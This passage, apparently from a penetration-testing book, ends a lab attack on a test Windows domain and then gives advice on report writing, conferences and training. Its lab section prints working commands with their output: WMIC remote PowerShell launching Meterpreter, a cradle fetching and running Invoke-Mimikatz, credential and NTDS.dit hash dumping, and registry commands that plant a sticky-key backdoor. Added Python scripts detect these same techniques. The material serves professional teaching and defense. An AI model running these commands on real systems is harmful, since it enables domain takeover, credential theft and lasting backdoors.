wmic /USER:"hacker\testuser1" /PASSWORD:"!Asdfasdfasdf1!" /NODE:172.16.151.201 process call create "%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0A...AAwACAALQBGAG8AcgBjAGUA"
Executing (Win32_Process)->Create()
Method execution successful.
};

C:\Users\testuser1>

[*] 172.16.151.201:49977 Request received for /INITM...
[*] 172.16.151.201:49977 Staging connection for target /INITM received...
[*] Meterpreter session 11 opened (172.16.151.128:8080 -> 172.16.151.201:49977)
at 2015-02-14 17:11:02 -0500


Remotely Executing PowerShell Using WMI
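The encoded PowerShell commands above are what a defender sees in process-creation logs when WMI is used this way: a child of WmiPrvSE.exe running powershell with a long -enc or -EncodedCommand argument. The following is an added detection example, not code from the book or from any tool it describes. It decodes the argument (PowerShell expects base64 over UTF-16LE, which is why the blobs on the page are full of "A" characters) and flags download cradles and shellcode injection. The log lines and the URL in the sample are constructed; the ParentImage=/CommandLine= field format is an assumption about the log source.

```python
"""Decode PowerShell -enc / -EncodedCommand arguments from process-creation
log lines and flag download-and-execute cradles. Added example; not code
from the book or from any tool it describes."""
import base64
import re

# Tokens that indicate an in-memory download cradle or shellcode injection,
# the pattern used by the WMIC lateral-movement commands above.
SUSPICIOUS_TOKENS = ("IEX", "Invoke-Expression", "DownloadString", "Net.WebClient",
                     "Invoke-Shellcode", "Invoke-Mimikatz")
# Common spellings PowerShell accepts for the encoded-command switch.
ENC_FLAG = re.compile(r"-(?:e|ec|en(?:c(?:odedcommand)?)?)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
PARENT = re.compile(r"ParentImage=(\S+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded script for the first -enc style argument that
    decodes cleanly, or None when there is none."""
    for m in ENC_FLAG.finditer(cmdline):
        try:
            return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue
    return None


def classify(line):
    """Decode if needed, then report which suspicious tokens appear and
    whether the process was spawned by the WMI provider host."""
    decoded = decode_encoded_command(line)
    text = decoded if decoded is not None else line
    hits = [t for t in SUSPICIOUS_TOKENS if t.lower() in text.lower()]
    parent = PARENT.search(line)
    wmi_spawned = bool(parent) and parent.group(1).lower().endswith("\\wbem\\wmiprvse.exe")
    return {"encoded": decoded is not None, "decoded": decoded, "hits": hits,
            "suspicious": bool(hits), "wmi_spawned": wmi_spawned}


def encode_for_powershell(script):
    """Used only to build the constructed sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def scan(lines):
    return [classify(line) for line in lines]


# Constructed sample log: one benign encoded command, one cradle shaped like
# the book's (placeholder URL and address), one plain interactive command.
BENIGN = "Get-Service | Where-Object Status -eq Running"
CRADLE = ("IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/x.ps1'); "
          "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 10.0.0.1 -Lport 8080 -Force")
SAMPLE_LOG = [
    "ParentImage=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe CommandLine=powershell -EncodedCommand "
    + encode_for_powershell(BENIGN),
    "ParentImage=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe CommandLine=powershell -enc "
    + encode_for_powershell(CRADLE),
    "ParentImage=C:\\Windows\\explorer.exe CommandLine=powershell -NoP -c Get-Date",
]

if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(r["wmi_spawned"], r["suspicious"], r["hits"], (r["decoded"] or "")[:60])
```

Two of the three sample lines are WMI-spawned, but only the one whose decoded script contains a download cradle and Invoke-Shellcode is reported as suspicious; the encoded-but-benign line shows why decoding has to come before matching rather than alerting on "-enc" alone.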
Eighty-Yard Line:


We now have a Meterpreter shell on that host and find that we are a local admin on it. We run
a quick getsystem and then need to pull hashes. We drop back into Easy-P, create a dump hashes
command, and execute it:


==Easy-P==

[1] Privilege Escalation
[2] Lateral Movement
[3] Keylogging
[4] PowerShell Meterpreter
[5] Change Users Execution Policy
[6] Powershell 101
[7] Base64 Encode a PowerShell Script
[8] Mimikatz - Passwords from Memory
[99] Exit/Quit

Select An Option: 8

[*]Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebCl
tz/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mi

[*]Base64 encoded version download and execute:

Powershell.exe -NoP -NonI -Exec Bypass -enc SQBFAFgAIAAoAE4AZQB3AC0


Generating PowerShell to Dump Hashes






C:\Windows\system32>Powershell.exe -NoP -NonI -Exec Bypass -enc SQBFAFgAIAAoAE4AZQB3AC0

  .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (May 20 2014 08:56:48)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY 'gentilkiwi' ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz                   (oe.eo)
  '#####'                                    with 14 modules * * */

mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 176782
Session           : Interactive
User Name         : lab
Domain            : HACKER
SID               : S-1-5-21
        msv :
         [00000003] Primary
         * Username : lab
         * Domain   : HACKER
         * NTLM     : 0aa3d8c4a87962d9356e09480de5ebbe
         * SHA1     : 91fd3da0e2456fb1d31663b9385e881e705a561c
        tspkg :
         * Username : lab
         * Domain   : HACKER
         * Password : !Asdfasdfasdf1!


Executing PowerShell Mimikatz


Goal Line:


We have obtained the password for a Domain Administrator. Let’s use Metasploit and pull the hashes
off of the Domain Controller.

Metasploit has a great module to pull hashes:

• use auxiliary/admin/smb/psexec_ntdsgrab

• Make sure to SET the fields for RHOST, SMBDomain, SMBPass, and SMBUser

• exploit




msf auxiliary(psexec_ntdsgrab) > show options

Module options (auxiliary/admin/smb/psexec_ntdsgrab):

   Name                  Current Setting   Description
   ----                  ---------------   -----------
   CREATE_NEW_VSC        false             If true, attempts to create a volume shadow copy
   RHOST                 172.16.151.200    The target address
   RPORT                 445               Set the SMB service port
   SERVICE_DESCRIPTION                     Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                    The service display name
   SERVICE_NAME                            The service name
   SMBDomain             hacker.testlab    The Windows domain to use for authentication
   SMBPass               !Asdfasdfasdf1!   The password for the specified username
   SMBSHARE              C$                The name of a writeable share on the server
   SMBUser               lab               The username to authenticate as
   VSCPATH                                 The path to the target Volume Shadow Copy
   WINPATH                                 The name of the Windows directory (examples: WINDOWS, WINNT)

msf auxiliary(psexec_ntdsgrab) > exploit

[*] 172.16.151.200:445 - Checking if a Volume Shadow Copy exists already...
[*] 172.16.151.200:445 - Service start timed out, OK if running a command or non-service executable...
[*] 172.16.151.200:445 - No VSC Found.
[*] 172.16.151.200:445 - Creating Volume Shadow Copy
[*] 172.16.151.200:445 - Service start timed out, OK if running a command or non-service executable...
[+] 172.16.151.200:445 - Volume Shadow Copy created
[*] 172.16.151.200:445 - Service start timed out, OK if running a command or non-service executable...
[*] 172.16.151.200:445 - Checking if NTDS.dit exists...
[*] 172.16.151.200:445 - Service start timed out, OK if running a command or non-service executable...
[*] 172.16.151.200:445 - Service start timed out, OK if running a command or non-service executable...
[*] 172.16.151.200:445 - Downloading ntds.dit file
[+] 172.16.151.200:445 - ntds.dit stored at /root/.msf4/loot/20150214180250_default_172.16.151.200_psexec.ntdsgrab._641158.dit
[*] 172.16.151.200:445 - Downloading SYSTEM hive file
[+] 172.16.151.200:445 - SYSTEM hive stored at /root/.msf4/loot/20150214180253_default_172.16.151.200_psexec.ntdsgrab._127578.bin
[*] 172.16.151.200:445 - Executing cleanup...
[+] 172.16.151.200:445 - Cleanup was successful
[*] Auxiliary module execution completed
msf auxiliary(psexec_ntdsgrab) > show actions


Dumping the Domain Controller Hashes


If grabbing the NTDS.dit file was successful, Metasploit will drop the file into the /root/.msf4/loot/
folder. Next, convert the dit file to hashes with esedbtools (esedbexport) and NTDSXtract.


esedbexport command:

• esedbexport -t [Location of Export] [NTDS.dit file]

• /opt/esedbtools/esedbexport -t /tmp/ntds
/root/.msf4/loot/20150214180250_default_172.16.151.200_psexec.ntdsgrab._641158.dit


root@kali:/opt# /opt/esedbtools/esedbexport -t /tmp/ntds /root/.msf4/loot/20150214180250_default_172.16.151.200_psexec.ntdsgrab._641158.dit
esedbexport 20120102

Opening file.
Exporting table 1 (MSysObjects) out of 14.
Exporting table 2 (MSysObjectsShadow) out of 14.
Exporting table 3 (MSysObjids) out of 14.
Exporting table 4 (MSysLocales) out of 14.
Exporting table 5 (datatable) out of 14.
Exporting table 6 (hiddentable) out of 14.
Exporting table 7 (linkhistorytable) out of 14.
Exporting table 8 (link_table) out of 14.
Exporting table 9 (sdpropcounttable) out of 14.
Exporting table 10 (sdproptable) out of 14.
Exporting table 11 (sd_table) out of 14.
Exporting table 12 (MSysDefrag2) out of 14.
Exporting table 13 (quota_table) out of 14.
Exporting table 14 (quota_rebuild_progress_table) out of 14.
Export completed.


Recovering the NTDS.dit


Next, we need to run dshashes.py to convert our tables to password hashes:

• dshashes.py [datatable table] [link table] --passwordhashes [original bin file from
ntdsgrab]

• python /opt/NTDSXtract/dshashes.py /tmp/ntds.export/datatable.4
/tmp/ntds.export/link_table.7 /tmp/ --passwordhashes
/root/.msf4/loot/20150214180253_default_172.16.151.200_psexec.ntdsgrab._127578.bin


root@kali:/opt# python /opt/NTDSXtract/dshashes.py /tmp/ntds.export/datatable.4 /tmp/ntds.export/link_table.7 /tmp/ --passwordhashes /root/.msf4/loot/20150214180253_default_172.16.151.200_psexec.ntdsgrab._127578.bin
Running with options:
Extracting password hashes
Initialising engine...
Scanning database - 100% -> 3824 records processed
Extracting schema information - 100% -> 1738 records processed
Extracting object links...

List of hashes:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:0aa3d8c4a87962d9356e09480de5ebbe:::
lab:1001:aad3b435b51404eeaad3b435b51404ee:0aa3d8c4a87962d9356e09480de5ebbe:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:04f3c2fa60ed9f8f30803df6837ebed3:::
testuser1:1106:aad3b435b51404eeaad3b435b51404ee:0aa3d8c4a87962d9356e09480de5ebbe:::
testuser2:1107:aad3b435b51404eeaad3b435b51404ee:0aa3d8c4a87962d9356e09480de5ebbe:::
limited_user:1110:aad3b435b51404eeaad3b435b51404ee:0aa3d8c4a87962d9356e09480de5ebbe:::
limiteduser:1111:aad3b435b51404eeaad3b435b51404ee:0aa3d8c4a87962d9356e09480de5ebbe:::
root@kali:/opt#


Parsing Hashes
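The dump above shows something a report should call out before any cracking happens: almost every account, the built-in Administrator included, carries the same NT hash, and NT hashes are unsalted, so identical hashes are identical passwords. The following is an added example, not code from the book or from NTDSXtract: it parses pwdump-format lines (user:rid:LM:NT:::) and reports password reuse, stored LM hashes and empty passwords. The sample uses the accounts from the dump above plus two constructed accounts (guest and svc_legacy) to exercise the other two checks.

```python
"""Parse pwdump-format lines (user:rid:LM:NT:::) such as the dshashes.py
output above and audit them for password reuse, stored LM hashes and empty
passwords. Added example; not part of the book or of NTDSXtract."""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of the empty string (LM storage disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty string


def parse_pwdump(lines):
    """Return a list of (user, rid, lm, nt); malformed lines are skipped."""
    entries = []
    for line in lines:
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if not rid.isdigit() or len(lm) != 32 or len(nt) != 32:
            continue
        entries.append((user, int(rid), lm, nt))
    return entries


def find_reuse(entries):
    """Group accounts by NT hash. NT hashes are unsalted, so an identical
    hash means an identical password: cracking or passing one hash opens
    every account in the group."""
    groups = defaultdict(list)
    for user, rid, _lm, nt in entries:
        groups[nt].append((user, rid))
    return {nt: members for nt, members in groups.items() if len(members) > 1}


def audit(lines):
    """Return (kind, detail) findings a reviewer would put in the report."""
    entries = parse_pwdump(lines)
    findings = []
    for user, _rid, lm, nt in entries:
        if nt == EMPTY_NT:
            findings.append(("empty_password", user))
        if lm != EMPTY_LM:
            findings.append(("lm_hash_present", user))
    for members in find_reuse(entries).values():
        names = ",".join(user for user, _ in members)
        # RID 500 is the built-in Administrator; reuse there is the worst case.
        kind = "admin_password_reuse" if any(rid == 500 for _, rid in members) else "password_reuse"
        findings.append((kind, names))
    return findings


# Constructed sample: the accounts from the dump above plus two made-up ones
# (guest with an empty password, svc_legacy with an LM hash still stored).
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0aa3d8c4a87962d9356e09480de5ebbe:::
lab:1001:aad3b435b51404eeaad3b435b51404ee:0aa3d8c4a87962d9356e09480de5ebbe:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:04f3c2fa60ed9f8f30803df6837ebed3:::
testuser1:1106:aad3b435b51404eeaad3b435b51404ee:0aa3d8c4a87962d9356e09480de5ebbe:::
testuser2:1107:aad3b435b51404eeaad3b435b51404ee:0aa3d8c4a87962d9356e09480de5ebbe:::
limited_user:1110:aad3b435b51404eeaad3b435b51404ee:0aa3d8c4a87962d9356e09480de5ebbe:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_legacy:1200:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
this line is not a hash record
""".splitlines()

if __name__ == "__main__":
    for kind, detail in audit(SAMPLE_DUMP):
        print(f"{kind}: {detail}")
```

The same grouping works on the output of any pwdump-style tool, and the reuse finding is what turns "we dumped the hashes" into a remediation item: the fix is per-account unique passwords (and a krbtgt reset), not just rotating the one credential that was caught.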



Touchdown! Touchdown! Touchdown!


We have just dumped the whole Active Directory environment! Lastly, we add a little backdoor for
persistence. We quickly run a few registry changes on the Domain Controller and all the hosts in
order to enable the Sticky Key backdoor.


• wmic /user:[User_Name] /password:[Password] /node:[Server] process call create
"C:\Windows\system32\reg.exe ADD \"HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\sethc.exe\" /v Debugger /t REG_SZ
/d \"C:\windows\system32\cmd.exe\" /f"

• wmic /user:[User_Name] /password:[Password] /node:[Server] process call create
"C:\Windows\system32\reg.exe ADD
\"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\"
/v UserAuthentication /t REG_DWORD /d 0 /f"

• wmic /user:[User_Name] /password:[Password] /node:[Server] process call create
"C:\Windows\system32\reg.exe ADD
\"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\"
/v SecurityLayer /t REG_DWORD /d 0 /f"


Now, even if they change all their passwords, we still have a system shell on their DCs.
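Because this persistence survives password changes, it is exactly what the client's remediation needs to check for. The following is an added example, not code from the book: it audits a registry export (the text format produced by reg export) for a Debugger value under Image File Execution Options for any accessibility binary, and for RDP-Tcp values that disable Network Level Authentication, which is what the three commands above set. The sample export is constructed; the notepad.exe entry is there to show that a debugger on a non-accessibility binary is not reported.

```python
"""Audit a registry export (.reg text from "reg export") for the
persistence described above: an Image File Execution Options debugger on an
accessibility binary, plus RDP-Tcp settings that turn off Network Level
Authentication. Added example; not code from the book. Sample is constructed."""
import re

# Binaries reachable from the pre-logon screen; a Debugger value under any
# of them means a program runs as SYSTEM before anyone authenticates.
ACCESSIBILITY_BINARIES = {"sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
                          "magnify.exe", "displayswitch.exe"}
IFEO_PREFIX = ("hkey_local_machine\\software\\microsoft\\windows nt\\currentversion"
               "\\image file execution options\\")
RDP_TCP = ("hkey_local_machine\\system\\currentcontrolset\\control\\terminal server"
           "\\winstations\\rdp-tcp")
VALUE_LINE = re.compile(r'"([^"]+)"=(?:dword:([0-9a-fA-F]{8})|"(.*)")$')


def parse_reg(text):
    """Return {key_path_lower: {value_name_lower: (type, data)}} for the
    string and dword value forms used by the reg.exe commands above."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
            continue
        m = VALUE_LINE.match(line) if current is not None else None
        if not m:
            continue
        name, dword, string = m.groups()
        if dword is not None:
            keys[current][name.lower()] = ("dword", int(dword, 16))
        else:
            # .reg files double every backslash inside string data
            keys[current][name.lower()] = ("string", string.replace("\\\\", "\\"))
    return keys


def audit(text):
    """Return (finding, binary_or_value_name, data) tuples."""
    keys = parse_reg(text)
    findings = []
    for path, values in keys.items():
        if path.startswith(IFEO_PREFIX):
            binary = path[len(IFEO_PREFIX):]
            if binary in ACCESSIBILITY_BINARIES and "debugger" in values:
                findings.append(("ifeo_debugger", binary, values["debugger"][1]))
    rdp = keys.get(RDP_TCP, {})
    # An absent value is treated as "not disabled"; only an explicit 0 is reported.
    if rdp.get("userauthentication", ("dword", 1))[1] == 0:
        findings.append(("rdp_nla_disabled", "UserAuthentication", 0))
    if rdp.get("securitylayer", ("dword", 1))[1] == 0:
        findings.append(("rdp_securitylayer_rdp", "SecurityLayer", 0))
    return findings


# Constructed export: the sethc.exe debugger and the two RDP values set by the
# commands above, plus an unrelated IFEO entry that must not be flagged.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\windows\\system32\\cmd.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\tools\\mydebugger.exe"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"UserAuthentication"=dword:00000000
"SecurityLayer"=dword:00000000
"PortNumber"=dword:00000d3d
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE_REG):
        print(finding)
```

Run against an export of HKLM from each host (the two hives above are enough), the three findings map one-to-one onto the three wmic commands, which makes the check easy to hand to the client as a post-remediation verification script of the kind mentioned in the reporting section.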





Sticky Key 


The crowd goes wild and you pull out your best touchdown dance. With that successful two-minute 
drill, you go home complete and ready to write your report. 






Post Game Analysis - Reporting 


Success! You have finally fully compromised Secure Universal Cyber Kittens, pivoted to sensitive 
networks, stolen credentials and documents, and managed to keep backdoors on their servers. Now, it 
is time to wrap up the test and write the final report. 


The final delivered report is really the only thing that will matter to the client. The report is how you,
the penetration tester, will get paid and be asked to come back. Therefore, this is by far the most
important aspect of your test. You need to be able to explain the findings, rate the vulnerabilities, and
explain how the results will affect the customer in the real world. Regardless of how many hosts you
compromise or how quickly you move laterally through the network, if the client can’t understand the
end report, reproduce the exploitation, and effectively implement remediation, the test has little value.
Anyone can run a vulnerability scanner and change the organization name, but not everyone can
understand what the vulnerabilities actually mean.


If you have ever had multiple penetration testers assess your network, you will find that the reports 
will vary based on who is performing the test. Some pentesting companies will just re-template a 
vulnerability scanner report, while quality pentesting companies will provide a well-detailed report 
and include repeatable steps. There is little value in a report that merely states that the client has 100 
critical Apache/PHP findings. Real value comes from the fact that the report can confirm whether or 
not the findings are valid based on the vulnerability, not just based on the banner version. 


Your final report should be influenced by your own presentation style and findings. However, I will 
give you some hints and best practices when creating your report. 

Some things to think about when writing a report: 

• I say this every time: DON’T SUBMIT A RE-TITLED Nexpose or Nessus report. I
have seen this happen more than once or twice in my lifetime, where we received a
re-titled report from a consulting company.

• Rate your vulnerabilities

o You should figure out a way to consistently rate your vulnerabilities.
I have built my own matrix that includes references from NIST, DISA,
CVSS, and personal experience to assign ratings to vulnerabilities.

o The matrix includes increasing or decreasing severity based on
internal/external findings, possible availability of exploit code, how
widespread their systems are, what the exploits can lead to, and how it
affects the CIA security triangle.

o Vulnerabilities that go through my matrix will always have the same
criticality level. If a client asks how I scored a rating for a
vulnerability, I can reference my matrix.

o You might have a vulnerability that might be a “medium” in severity
to the scanner, but what if it is systemic? If it is found not on one host
but on every host, does the overall severity of the issue turn to “high”?

• Theoretical vs. Real Findings 

o I generally do not like to mark findings as critical if they are only 
theoretical and have no actual known exploit available. These should 
still be considered findings, but I will generally lower the rating if I 
can't find any avenue to exploit the host. 

o This gives the client help in properly identifying which findings need 
immediate attention versus those that can be applied during a regular 
change control window. 

• Solutions are just as important as the findings 

o If you use a tool to compromise a network, you have to have a 
solution to stop it. 

o If you don't have a solution, help the client develop a mitigation 
strategy. 

• Don’t mis-rate vulnerabilities 

o HTTP Flags: As I have said in the prior book, I still see HTTP flags 
all the time. A scanner will come back with flags not being enabled, 
such as secure flag or missing httpOnly. What if the site doesn’t even 
support any type of client authentication or even provide a user with 
any input variables? It is definitely a finding, but it could be 
significantly lower than the scanner outputs. 

o Cross site scripting can be very dangerous, but having a “high”
finding within a forum versus a site that has no users or data to be
inputted to a backend database, should have very different ratings.

o Apache Findings: This is a great example of what I feel distinguishes
good reports from bad reports. Apache findings come up all the time
because they are solely based on banner results. You might see a PHP-CGI
finding that comes up as critical and report it, but when the client
investigates it, he/she finds that CGI wasn’t even enabled on the server.

• Make sure vulnerabilities are actual vulnerabilities 

o I don't know how many times I have received penetration testing 
results telling me my systems had PHP exploits on them. This is 
because the scanner, based on version, alerted them of these critical 
findings. Some of the findings state that they are PHP CGI issues or 
Apache mod security issues. The problem is my servers don't run the 
CGI scripts, but the scanner identified the issue just solely based on 
versioning. Please make sure that you validate that findings are actual 
findings. 

• Standardize all your reports by using LaTeX templates or something similar.


Again, all these findings should be reported, but having the right severity rating is what is important.
It is critical when writing a penetration test report to identify what is realistic versus what is theoretical. I
generally have two parts to a report: the first is what can actually be done with known exploits, and
the second is everything else that the scanner picked up.
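The rating rules above (lower theoretical findings, raise systemic ones, weigh exposure and CIA impact, and keep unvalidated scanner output in the second part of the report) are easy to state and hard to apply consistently by hand. The following is an added example, not the author's matrix: a small scoring function that applies those rules to a base score so the same input always yields the same label. The weights, thresholds and the Finding fields are my own assumptions; the four sample findings are constructed to mirror the cases discussed in the text.

```python
"""A consistent rating matrix of the kind described above: a scanner/CVSS
base score is adjusted for exploit availability, exposure, systemic spread
and CIA impact, and unvalidated findings are kept out of the rated list.
Added example; weights and thresholds are my own assumptions, not the
author's matrix."""
from dataclasses import dataclass


@dataclass
class Finding:
    name: str
    base_score: float          # scanner/CVSS base score, 0.0 to 10.0
    exploit_available: bool    # public exploit code, or a demonstrated exploit path
    external: bool             # reachable from the Internet
    affected_hosts: int        # in-scope hosts carrying the issue
    total_hosts: int
    cia_impact: str            # "none", "partial" or "full"
    confirmed: bool            # validated by hand, not just a banner/version match


def rate(f):
    """Return (label, adjusted_score) for one finding."""
    if not f.confirmed:
        # Banner-only results go in the "everything else the scanner found" part.
        return "Unconfirmed", 0.0
    score = f.base_score
    if not f.exploit_available:
        score -= 2.0                      # theoretical: keep the finding, lower the rating
    score += 1.0 if f.external else -0.5  # exposure
    if f.total_hosts and f.affected_hosts / f.total_hosts > 0.5:
        score += 1.5                      # systemic: the "medium on every host" case
    score += {"none": -1.0, "partial": 0.0, "full": 1.0}[f.cia_impact]
    score = max(0.0, min(10.0, score))
    if score >= 9.0:
        label = "Critical"
    elif score >= 7.0:
        label = "High"
    elif score >= 4.0:
        label = "Medium"
    elif score > 0.0:
        label = "Low"
    else:
        label = "Informational"
    return label, round(score, 1)


def prioritize(findings):
    """Order findings for the report, highest adjusted score first."""
    rated = [(rate(f)[1], rate(f)[0], f.name) for f in findings]
    return sorted(rated, key=lambda r: r[0], reverse=True)


# Constructed examples mirroring the cases in the text.
EXAMPLES = [
    Finding("Missing HttpOnly flag on a static brochure site", base_score=5.0,
            exploit_available=False, external=True, affected_hosts=1, total_hosts=40,
            cia_impact="none", confirmed=True),
    Finding("Unpatched SMB service with public exploit on 35 of 40 hosts", base_score=7.5,
            exploit_available=True, external=False, affected_hosts=35, total_hosts=40,
            cia_impact="full", confirmed=True),
    Finding("Same SMB issue on a single host", base_score=7.5,
            exploit_available=True, external=False, affected_hosts=1, total_hosts=40,
            cia_impact="full", confirmed=True),
    Finding("Banner-only PHP-CGI alert, CGI confirmed disabled", base_score=9.0,
            exploit_available=False, external=True, affected_hosts=1, total_hosts=40,
            cia_impact="none", confirmed=False),
]

if __name__ == "__main__":
    for score, label, name in prioritize(EXAMPLES):
        print(f"{label:12} {score:4}  {name}")
```

The point of the function is not the particular weights but that every adjustment is explicit, so when a client asks why an issue was rated Critical the answer is a line in the matrix rather than a judgement call made on the day.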



What you shouldn’t do:

http://it.toolbox.com/blogs/securitymonkey/the-worlds-worst-penetration-test-report-by-scumbagpentester-58747

What you should have in your report: 

• Introduction/Overview 

o High-level description of the project, dates, and 
company/infrastructure being tested. 

• Scope and Objectives 

o This section should outline the IP ranges, URLs, and applications that 
are to be tested. It should also explain the purpose of the test. 

• Deviations from the Statement of Work 

o Many tests have changes from the original requirements, such as 
having to stop testing on a host, to stop scanning, and/or make changes 
to the testing windows. 

• Methodology 

o A high-level description of the testing process and standards. 

• Significant Assessment Findings 

o This section should be dedicated to critical findings. 

• Positive Observations 

o This part is just as important as the significant findings. No one likes 
to see a whole report where their company is beat up. Talking about 
what the company did well helps lessen the blow on where fixes need 
to be made. 

• Findings Summary 

o Overall view of the findings broken down by severity.
o Conclusion of the summary that explains whether the environment was found to
be vulnerable to any opportunities for exploitation.

• Detailed Findings 

o This should include severity, vulnerability definition, issue/detailed 
description/risks, asset, recommendation, snapshots/logs/how to 
exploit walkthrough 

• Appendix 

o Listing of all assets and ports 
o Additional information and snapshots 

Some examples of reports:

http://isecpartners.github.io/publications/iSEC_Cryptocat_iOS.pdf

https://www.offensive-security.com/reports/penetration-testing-sample-report-2013.pdf

http://www.pentest-standard.org/index.php/Reporting
http://resources.infosecinstitute.com/writing-penetration-testing-reports/








There are times when I generate a second report, based on the client. The second report will be 
directed toward higher management and will discuss the systemic issues and patterns of gaps in 
security. This shouldn’t be very detailed or technical, but should mainly state facts at a high-level, 
based on the test. 

Lastly, if you want to set yourself apart from other pentesters, try to find ways to give yourself added 
value that others may not offer. For example, if you are doing a PT for a large company, you can 
provide a simple OSINT (Open Source Intelligence) report, in addition to the final report, to describe 
what and who can be publicly found from the Internet. There have been times when I created scripts 
(Python, PowerShell, Bat) that perform checks against critical findings, so that after they remediate 
their systems, they can just execute the script to verify. 



Continuing Education 


So, you have just finished this book and may have a thirst for more. One of the most important factors
in succeeding in this field is that it takes experience, not just learning from books and videos. Start
learning from labs and vulnerable VMs. If you do not currently work for a penetration testing
company, start working on bug bounties. Bug bounties are legal ways to find security bugs on
production sites. Remember to read ALL the fine print before doing any testing.


Bug Bounties:

• https://bugcrowd.com/list-of-bug-bounty-programs

• http://www.bugsheet.com/bug-bounties

Secondly, if you aren’t involved in the security community, you’re doing it wrong! It is easy to get
involved. There are a ton of local security groups in every city:


B-sides: http://www.securitybsides.com/w/page/12194156/FrontPage
OWASP: https://www.owasp.org/index.php/OWASP_Chapter
Hacker Spaces: http://hackerspaces.org/wiki/List_of_hackerspaces


Major Security Conferences: 


If you are looking for the bleeding-edge research, security conferences are the place to go. It is a great 
place to meet like-minded individuals, get your hands dirty, and learn. Two major websites that have 
a great list of security conferences are: 

• https://secore.info/conferences 

• http://infosecevents.net/calendar/ 


I will give you a small sample of the conferences that I would recommend from personal experience 
(in no particular order): 

• DefCon (http://www.defcon.org/) - This is one of the largest hacker conferences in
the world and takes place in Las Vegas, NV. This conference is a must and is
relatively affordable.

• DerbyCon (https://www.derbycon.com/) - Another relatively low-cost conference,
which takes place in Kentucky. Some of my favorite talks have come from DerbyCon.

• BlackHat (http://www.blackhat.com/) - This conference is also held in Las Vegas,
NV and is directed more toward corporate employees. It has great speakers, but is
extremely expensive.

• Bsides (http://www.securitybsides.com/) - There are Bsides conferences all over
the country and they are usually FREE. Find yours!

• ToorCon (http://toorcon.net/) - This is one of the smaller conferences and is held in
San Diego, CA. You will meet a lot of new people here and everyone is pretty
friendly.

• CanSec (http://cansecwest.com/) - CanSecWest is one of the more
technical conferences. Although extremely pricey, it is best known for its PWN2OWN
contest.

• Shmoocon (http://www.shmoocon.org/) - One of the largest conferences on the east
coast and usually under $200. This is one of my favorite conferences.

• OWASP AppSec
(https://www.owasp.org/index.php/Category:OWASP_AppSec_Conference) - Cheap
and fun conference focused on web application security. Cost is typically under $100
if you are an OWASP member.

• Lethal (http://www.meetup.com/LETHAL/) - Of course, I have to include my group.
Although it is not a conference, we have monthly meetups and have presenters. Not
only is it free, but the group is small, so it is easy for you to get involved and meet
others with similar interests. If you are in the LA/Orange County CA area, come by!

• The Ethical Hackers Club (TEHC) - This is one of my old groups in the Maryland
area. TEHC is open for anybody with or without experience in network and computer
security. They offer an open forum of discussion and informal training on anything
network and computer security related. Sign up at www.t-e-h-c.com or
http://www.meetup.com/ethical-hacker-club.


But don’t forget, sometimes the best conferences are those that are local. They might not have the most 
famous speakers or most professional setting, but this is where you will find people just like you. I 
find that the people at the local events are much more open to sharing and working on projects 
together. 


Training Courses: 


If you are looking for a jumpstart into a particular field in security, you would most likely benefit 
from a training course. Since there are so many different training courses to choose from, here are 
some recommendations: 

• BlackHat - This one is pretty expensive, but it offers a lot of different courses,
which are taught by some of the best.

• DerbyCon - Well-priced training in Kentucky that occurs during the conference.

• SANS (http://www.sans.org) - Expensive training, but they are the industry
standard.

• Offensive Security (http://www.offensive-security.com/) - Well-priced and I highly
recommend taking the online Offensive Security courses. You get a lot of great hands-on
experience, but will need to invest a lot of time.

• Exodus (https://www.exodusintel.com/training.html) - Excellent training course
for advanced vulnerability and exploitation courses.











Free Training:


